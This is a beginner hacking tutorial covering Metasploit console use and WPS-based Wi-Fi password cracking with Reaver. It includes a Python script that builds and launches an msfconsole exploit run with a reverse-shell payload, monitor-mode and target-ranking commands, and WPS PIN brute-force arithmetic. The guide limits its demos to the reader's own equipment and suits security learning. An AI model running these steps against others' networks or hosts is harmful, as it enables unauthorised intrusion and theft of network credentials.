How to Hack Computers
A Guide to Hacking Computers for Beginners
Contents
Continuation of the previous notes
Chapter 9 – Using Metasploit to Hack Devices
1. Basic Metasploit Commands
Chapter 10 – Wireless Password Hacking
1. VMWare Wireless Password Cracking Caveats
2. Docker Demonstration
3. Using Reaver to Crack Passwords
In Summary
Chapter 9 – Using Metasploit to Hack Devices
Now that we have taken a look at how to use command line tools via the terminal in Linux, things are going to heat up a little. While NMAP is a fantastic tool for mapping a local network and gathering information about hosts, Metasploit is designed to help you actually break into a system by exploiting known vulnerabilities. If you installed the full version of Kali Linux in the VMWare chapter with the right security packages, you should already have Metasploit installed; it is also packaged for several other Linux distributions. Metasploit is written in Ruby and there is an installer for Windows, but Kali ships it ready to go and nearly all of the documentation assumes Linux, so that is what we will use. Please understand that Metasploit is an extremely advanced tool, and entire books and manuals have been written about it. I couldn't possibly hope to cover every exploit found within Metasploit, and its modules (exploits, payloads and auxiliary scanners) are updated constantly. What I do want to show you are some basic commands, how to navigate the Metasploit prompt, and a basic demonstration of how Metasploit can be used to hack a computer.
Also, note that I intentionally showed you how to use NMAP before Metasploit. As it turns out, you can run NMAP from the Metasploit prompt with the db_nmap command, which takes the same arguments as nmap but stores the results in Metasploit's PostgreSQL database. Once the hosts and services from your scan are in the database (look at them with the hosts and services commands), they can be used as input for other Metasploit modules instead of retyping every IP address and port.
But just what exactly is Metasploit? Metasploit is an exploitation framework that is huge in the hacking and network penetration testing world, and I definitely recommend learning this tool. Newbies have a hard time wrapping their heads around the fact that Metasploit is a framework and not a single stand-alone application: it is a library of modules (exploits, payloads, encoders, auxiliary scanners and post-exploitation scripts) plus the tooling to combine them. A lot of hackers build their own custom-tailored attacks on top of the code found in this handy tool. For example, if you were studying a vulnerability in the latest version of Windows, you would write or adapt a Metasploit exploit module for it, use the framework's auxiliary scanners to find exposed hosts, and use its payloads to take advantage of the flaw.
Lastly, you need to be familiar with some Metasploit terminology (payloads, exploits, listeners, interfaces) and have a general understanding of the database before moving forward. An exploit is a module that takes advantage of a specific, known vulnerability in order to run code on the target. A payload is the code the exploit delivers and runs once it succeeds; the most common payloads are a command shell or Meterpreter, and from that session you run further commands to take advantage of the compromised computer. Listening does not mean sniffing traffic the way Wireshark does: a listener (handler) is Metasploit waiting on a local port for a reverse payload to connect back from the target, which is why the LHOST and LPORT options matter. Metasploit interfaces are the ways you drive the framework, chiefly the MSFconsole command line and the Armitage GUI; do not confuse these with the network interfaces on your computer, such as the wireless card or the Ethernet port, whose address is what you put in LHOST.
1. Basic Metasploit Commands
To begin the hacking demonstration, you need to be familiar with several basic Metasploit commands and know what they do. First of all, you need to know how to reach the Metasploit prompt. To begin, open the terminal (the window that runs your shell) and type the following:
- msfconsole
If you have properly installed the Metasploit framework, you should reach a prompt that displays 'msf' (newer versions include the major version, e.g. 'msf6') followed by a greater-than sign. From this prompt there are a variety of basic commands you can use to get help, show additional commands, select modules, set targets and ports for exploits, and many other useful features. Option names are case-insensitive, so set rhosts and set RHOSTS do the same thing. The following is a list of the basic Metasploit commands and their functions:
- help – lists the console commands; help [COMMAND] describes one of them
- search [TERM] – searches the modules by name or keyword
- use [MODULE] – selects an exploit (or auxiliary/post) module; every command below acts on the selected module
- show options – lists the options the selected module needs and which are still missing
- show payloads – lists the payloads compatible with the selected exploit
- set RHOSTS 192.168.1.3 – sets the remote host (target) of the attack to 192.168.1.3 (versions before Metasploit 5 used RHOST)
- set LHOST 192.168.1.2 – sets the attacking local host to 192.168.1.2, i.e. the address a reverse payload connects back to
- set RPORT 80 – sets the port on the target host that the exploit talks to
- set LPORT 53 – sets the local port on which the attacker's listener waits
- set payload [PAYLOAD] – chooses the payload the exploit will deliver
- unset RHOSTS – removes the target's IP address; unset LHOST removes the local attacking host's address
- exploit (or run) – launches the selected module; exploit -j runs it as a background job
- back – leaves the selected module and returns to the initial Metasploit prompt
- sessions -l – displays active sessions
- sessions -i [ID] – interacts with an active session, where [ID] is the numeric value taken from the previous command
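The commands above are typed one at a time, but msfconsole can also replay them from a resource script (msfconsole -q -r file.rc), which makes a scan-then-exploit run repeatable. The following Python helper is an added example and not code from the original page: it builds such a script, including the db_nmap step, and validates the addresses before anything is launched. The module path exploit/example/module and the lab addresses are placeholders you replace with your own (generic/shell_reverse_tcp is a real Metasploit payload name), and msfconsole is only started if it is installed.

```python
import ipaddress
import shutil
import subprocess
from pathlib import Path


def build_rc(module, payload, rhosts, lhost, lport=4444, rport=None, nmap_args="-sV"):
    """Return the text of an msfconsole resource script (one console command per line).

    Order matters: `use` selects the module before any `set`, because options
    belong to the selected module. LHOST/LPORT are where a reverse payload
    connects back, so they must be the attacker's address, never a target's.
    """
    targets = rhosts.split()
    if not targets:
        raise ValueError("RHOSTS needs at least one target")
    for addr in targets + [lhost]:
        ipaddress.ip_address(addr)            # raises ValueError on a malformed address
    if lhost in targets:
        raise ValueError("LHOST must be the attacker's address, not a target")
    if not 1 <= int(lport) <= 65535:
        raise ValueError("LPORT out of range")
    lines = [
        "db_status",                                  # confirm the database is connected
        f"db_nmap {nmap_args} {' '.join(targets)}",   # same flags as nmap; results stored in the db
        "hosts",                                      # show what the scan recorded
        "services",
        f"use {module}",
        f"set RHOSTS {' '.join(targets)}",
        f"set payload {payload}",
        f"set LHOST {lhost}",
        f"set LPORT {int(lport)}",
    ]
    if rport is not None:
        lines.append(f"set RPORT {int(rport)}")
    lines += [
        "show options",      # a required option left empty is the usual reason exploit fails
        "exploit -j",        # run as a background job so the console stays usable
        "sleep 10",
        "sessions -l",       # any session listed here is a shell on the target
    ]
    return "\n".join(lines) + "\n"


def write_and_run(rc_text, path="lab.rc"):
    """Write the script and replay it with msfconsole when it is installed.

    Returns (path, return code); the return code is None on a machine
    without Metasploit, so the script is still produced for inspection.
    """
    rc_path = Path(path)
    rc_path.write_text(rc_text)
    if shutil.which("msfconsole") is None:
        return rc_path, None
    result = subprocess.run(["msfconsole", "-q", "-r", str(rc_path)], check=False)
    return rc_path, result.returncode


if __name__ == "__main__":
    # Placeholder module path and lab addresses (assumptions for this demo).
    script = build_rc("exploit/example/module", "generic/shell_reverse_tcp",
                      "192.168.1.3", "192.168.1.2", lport=53, rport=80)
    print(script)
```

Read the generated file before replaying it: the show options line is there so the console output tells you which required option you forgot before exploit -j runs.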
Chapter 10 – Wireless Password Hacking
If you didn't know already, there are methods of cracking wireless passwords so you can gain access to wireless networks when you don't have the security key. Again, please only try this on your home networking equipment. Though it may be tempting to use this method to hack into your neighbor's wireless network for free Wi-Fi, this is a huge breach of privacy and it is not legal to do so. Breaking into a badly configured wireless network is actually a pretty simple process. However, there are a couple of caveats.
You see, there are several different Wi-Fi security standards. WEP (Wired Equivalent Privacy) is broken outright: with enough captured traffic the key itself can be recovered in minutes, no matter how well it was chosen. WPA (Wi-Fi Protected Access) and WPA2 are sound designs, but in the usual home setup (a shared passphrase, WPA-PSK) they are only as strong as that passphrase, which an attacker can guess offline after capturing a client's four-way handshake, and they are undermined entirely if the router has WPS (Wi-Fi Protected Setup) enabled, which is the weakness the Reaver demo in this chapter uses. Many routers ship with WPS turned on, and your average home user doesn't know the difference and typically doesn't change the defaults.
Sometimes employees don't like to follow the rules and adhere to their company's security policies. Many companies forbid plugging a networking device into an Ethernet port, but network personnel often make a mistake in configuring the network, which gives an employee the opportunity to connect a wireless router to their Ethernet port. Usually employees want their own wireless signal because they think it will give them faster Internet speeds.
Whether or not it actually increases their speed, this scenario happens all the time. And the problem is that it leaves a gaping security hole for hackers to take advantage of. Because non-technical users don't understand the details of Wi-Fi security standards, they may leave the router on WEP, pick a weak WPA passphrase, or leave WPS enabled. Uh-oh, guess what? Now a hacker has a point of access into their corporate network! All the hacker has to do is crack the wireless password, and within minutes of recovering it the hacker can start attacking corporate hosts.
1. VMWare Wireless Password Cracking Caveats
Before we dig into the steps you need to take to crack a wireless password, I need to inform the VMWare users of one small caveat. The way VMWare is designed makes it almost impossible to run sniffing software on your laptop's built-in wireless interface. In fact, if you fire up your Linux distribution in VMWare and run the command ifconfig (or ip link), you will notice that there isn't a wireless interface present. Normally it would be listed as 'wlan0', but no such entry exists in the output.
The reason for this is that VMWare doesn't give control of your wireless network card to your virtual machines. Instead, the host's wireless connection is presented to the guest as a plain virtual Ethernet interface (eth0), and the tools below need a real wireless driver that supports monitor mode and packet injection. If you use a live boot CD or DVD, Linux has proper control of the wireless card and can do wireless sniffing. But what can a VMWare user do to crack wireless passwords? Should you just skip over this demo? Not a chance. There are two alternative solutions. The simplest is a USB wireless adapter with a Linux-supported chipset, connected to the virtual machine from VMWare's removable devices menu so that the guest sees it as wlan0. The other is the Docker setup below, which gives you a ready-made Kali toolset on top of that adapter.
2. Docker Demonstration
Enter Docker. Docker runs containers that share the kernel of the machine they run on, so a container cannot conjure up a wireless interface that your virtual machine doesn't have. What it can do, when started with --net=host and --privileged as shown below, is see and control every network interface the VM has, including a USB wireless adapter you have passed through, which makes it a convenient, throwaway environment with the Kali wireless tools installed regardless of which Linux you run in VMWare. I know it sounds odd running container software inside a virtual machine, but it's easy to do and only takes a few minutes to set up. The following is the process to build a Kali container and use it to hack wireless passwords like a professional.
First, make sure Docker itself is installed in your VM (on Kali or Debian: apt-get install docker.io). Then fetch the image definition and build script from the Internet. Run the following two commands, and remember that the build and run steps need administrative privileges:
-git clone https://github.com/docker-linux/kali
-cd kali/
Next, run the following two commands to build the Docker image and then open a shell inside a container started from it:
- sudo sh build-kali.sh
- sudo docker run -it linux/kali /bin/bash
If everything was successful, this should change your prompt to a pound sign (#), which indicates that you are root inside the container. The next thing we need to do is install the Kali metapackages inside it (refresh the package lists first). The names below are the Kali 1.x metapackages; in current Kali releases the equivalents are kali-linux-default, kali-tools-wireless and kali-tools-top10:
- apt-get update
- apt-get install kali-linux
- apt-get install kali-linux-wireless
- apt-get install kali-linux-top10
- exit
Now we need to save our work in the current container, which is just another way of saying that we commit the changes made inside it as a new image. To do this, we need to find the container's unique ID. Issue the following command to display that information:
- sudo docker ps -a
The information you need is listed under CONTAINER ID. Once you have it, plug it into the following command:
- sudo docker commit [CONTAINER ID] kali:1
Lastly, we need to enter the image we have created in privileged mode, sharing the VM's network stack so the wireless interface is visible inside the container. Note that --privileged and --net=host together give the container the same access to devices and interfaces as root on the VM itself, which is exactly what the wireless tools need:
- sudo docker run -it --net=host --privileged kali:1 /bin/bash
By now everything should be set up to crack wireless passwords from your Linux environment.
3. Using Reaver to Crack Passwords
If you want to hack wireless passwords like a pro, fire up your favorite Linux distribution and enter the Docker image we set up previously from the command line. I recommend doing this in the Kali environment, because the steps won't work on every Linux distribution. We are going to use a program called Reaver. Despite the chapter title, Reaver does not attack WPA encryption itself: it brute-forces the PIN of WPS (Wi-Fi Protected Setup), the push-button/PIN convenience feature that many routers leave enabled, and a router that accepts the PIN hands over its WPA/WPA2 passphrase. Reaver is prepackaged with Kali's wireless tools, but I'll run through the simple install procedure first. To begin, run the following two commands to refresh your package lists and to download and install Reaver:
- apt-get update
- apt-get install reaver
The terminal will ask whether you want to proceed after determining how much disk space the program will consume. Just type 'y' to proceed. After the operation completes, the terminal will confirm that Reaver was installed. Now we need to find the name of your wireless interface. With the adapter passed through to the VM and the container running with --net=host, you should see it when you run:
- iwconfig
After you find the name of your wireless interface, put it into monitor mode. First kill the network managers that would otherwise keep resetting the card, then start monitor mode on it:
- airmon-ng check kill
- airmon-ng start wlan0
This command prints some output, and you need to take note of one thing: the name of the new monitor-mode interface. On older versions of airmon-ng it is mon0; newer versions instead rename the card itself to wlan0mon. Either way, every command from here on uses that monitor interface, not wlan0. So now simply run:
- airodump-ng mon0
You'll notice after running this command that it spits out a list of MAC addresses, the BSSIDs of the wireless routers in range. If you don't see any output, wait longer for your card to pick up beacons, or check that you used the monitor interface name (mon0 or wlan0mon) rather than wlan0. The list refreshes continually; hit Ctrl+C to stop it.
You'll also notice that the encryption type is listed in the ENC column near the right-hand side of the output. Different encryption standards need different methods, and for this demo we want a network using WPA or WPA2 that also has WPS enabled. airodump-ng does not show WPS by default (recent versions add a WPS column with the --wps flag), so use wash, which is installed alongside Reaver, to list only the WPS-enabled access points and whether their WPS is currently locked:
- wash -i mon0
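airodump-ng can also write everything it sees to a file (airodump-ng -w scan mon0 produces scan-01.csv), which is easier to work from than the scrolling screen. The following Python helper is an added example and not part of the original chapter: it parses the access-point section of that CSV and ranks the WPA/WPA2 networks by signal strength. The capture embedded in it is constructed for the demo, with made-up BSSIDs and names; real files use CRLF line endings, which the parser normalises.

```python
import csv
import io

# Constructed sample in airodump-ng's CSV layout: access points, a blank line,
# then the station section. BSSIDs and ESSIDs are made up for this demo.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2015-03-01 10:00:00, 2015-03-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -41,  120,    0,   0.  0.  0.  0,   8, HomeNet1, 
AA:BB:CC:00:00:02, 2015-03-01 10:00:01, 2015-03-01 10:05:00, 11,  54, WEP, WEP, , -67,   80,  540,   0.  0.  0.  0,   6, OldNet, 
AA:BB:CC:00:00:03, 2015-03-01 10:00:03, 2015-03-01 10:05:00,  1,  54, WPA2 WPA, CCMP TKIP, PSK, -55,   95,    0,   0.  0.  0.  0,   7, CafeWiFi, 
AA:BB:CC:00:00:04, 2015-03-01 10:00:04, 2015-03-01 10:05:00,  6,  54, OPN, , , -80,   20,    0,   0.  0.  0.  0,   5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2015-03-01 10:01:00, 2015-03-01 10:05:00, -50,  300, AA:BB:CC:00:00:01, 
"""


def parse_access_points(text):
    """Return the access-point rows as dicts.

    The AP section ends at the first blank line; the station section after it
    has a different header and is ignored here. Fields are ", "-separated and
    padded, so skipinitialspace handles the alignment whitespace.
    """
    text = text.replace("\r\n", "\n")
    ap_section = text.split("\n\n", 1)[0]
    reader = csv.DictReader(io.StringIO(ap_section), skipinitialspace=True)
    aps = []
    for row in reader:
        if not row.get("BSSID"):
            continue
        aps.append({
            "bssid": row["BSSID"].strip(),
            "channel": int(row["channel"]),
            # "WPA2 WPA" means mixed mode, so keep the list rather than one string
            "privacy": row["Privacy"].strip().split(),
            "power": int(row["Power"]),        # dBm; closer to zero is a stronger signal
            "essid": row["ESSID"].strip(),
        })
    return aps


def rank_targets(aps, allowed=("WPA", "WPA2")):
    """Keep networks whose security is in `allowed`, strongest signal first.

    A weak signal is the usual reason Reaver stalls, so attack the strongest
    candidate. The CSV does not record WPS state, so confirm the pick with
    `wash -i mon0` before running Reaver against it.
    """
    picked = [ap for ap in aps if any(p in allowed for p in ap["privacy"])]
    return sorted(picked, key=lambda ap: ap["power"], reverse=True)


if __name__ == "__main__":
    for ap in rank_targets(parse_access_points(SAMPLE_CSV)):
        print(f"{ap['bssid']}  ch{ap['channel']:>2}  {ap['power']:>4} dBm  "
              f"{'/'.join(ap['privacy']):<9} {ap['essid']}")
```

To run it against your own scan, replace SAMPLE_CSV with the contents of scan-01.csv; the WEP and open networks in the sample are there to show that the filter drops them, since Reaver is of no use against either.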
Now run the following command, substituting your monitor interface and the BSSID of the WPS-enabled target:
- reaver -i [MONITORING INTERFACE e.g. mon0] -b [BSSID] -vv
Reaver tries PINs one after another until the router accepts one, and then prints both the WPS PIN and the WPA PSK, which is the network's passphrase. Expect this to take several hours. Be aware that many routers lock WPS for a while after a burst of failed PINs; Reaver warns when it detects that rate limiting, and its -d option adds a delay between attempts.
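Reaver works because of how WPS checks the PIN, not because of any weakness in WPA itself. The following Python is an added example, not code from the original page: it computes the WPS PIN checksum that the specification defines (hostapd implements the same arithmetic) and shows how the half-by-half verification collapses the search. The access point reveals after message M4 whether the first four digits were right and after M6 whether the next three were, so an attacker needs at most 10,000 + 1,000 guesses instead of 10,000,000. The PIN 12345670 is a commonly cited example PIN, used here only as a test value.

```python
def wps_pin_checksum(first7: int) -> int:
    """Checksum digit for the first seven PIN digits.

    Digits are weighted 3,1,3,1,... starting from the seventh digit, summed,
    and the checksum is whatever brings the total to a multiple of ten.
    """
    if not 0 <= first7 <= 9_999_999:
        raise ValueError("need the first seven digits as an integer")
    accum = 0
    pin = first7
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def wps_pin_valid(pin: str) -> bool:
    """True if `pin` is eight digits whose last digit is the correct checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return int(pin[7]) == wps_pin_checksum(int(pin[:7]))


def keyspace():
    """Guesses needed: naive brute force versus Reaver's split attack.

    Only 10^7 of the 10^8 eight-digit strings pass the checksum, so even a
    naive attacker has 10,000,000 candidates. Because the registrar answers
    the first four digits (M4) and the next three (M6) separately, the halves
    are searched one after the other: 10,000 + 1,000 attempts at most.
    """
    naive = 10 ** 7
    first_half = 10 ** 4      # digits 1-4, confirmed or rejected at M4
    second_half = 10 ** 3     # digits 5-7; digit 8 is computed, confirmed at M6
    return naive, first_half + second_half


def second_half_pins(first_half: int):
    """All 1,000 valid PINs that share a confirmed first half.

    This is the list Reaver walks once M4 has succeeded: the first four digits
    are fixed, the next three are enumerated and the checksum is recomputed.
    """
    if not 0 <= first_half <= 9999:
        raise ValueError("first half is four digits")
    pins = []
    for second in range(10 ** 3):
        seven = first_half * 1000 + second
        pins.append(f"{seven:07d}{wps_pin_checksum(seven)}")
    return pins


if __name__ == "__main__":
    naive, split = keyspace()
    print(f"checksum of 1234567 is {wps_pin_checksum(1234567)}")
    print(f"naive search: {naive:,} PINs; split search: at most {split:,}")
    print(f"after first half 1234 is confirmed: {len(second_half_pins(1234))} candidates")
```

The numbers also explain the lockout caveat above: a router that refuses WPS for an hour after ten bad PINs turns 11,000 attempts into weeks, which is why Reaver's delay options and the wash "Lck" column matter more than raw speed.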
In Summary
As noted earlier, hacking tools have become so sophisticated that they are extremely easy to use. As with other tools, the hard part is the patience it takes to set up the software. After you have completed the setup process, you can point your password cracking cannon at a wireless network and it will do all of the dirty work for you.
I bet you didn't think that cracking wireless passwords was so easy, did you? The scary part about this software is that it is free and readily available to anyone with an Internet connection. Just remember not to abuse your power by invading someone's privacy. For the purposes of this demonstration I would recommend that you set up your home router with WPA2 and WPS enabled, and turn WPS off again when you are done, since that is the setting the attack depends on.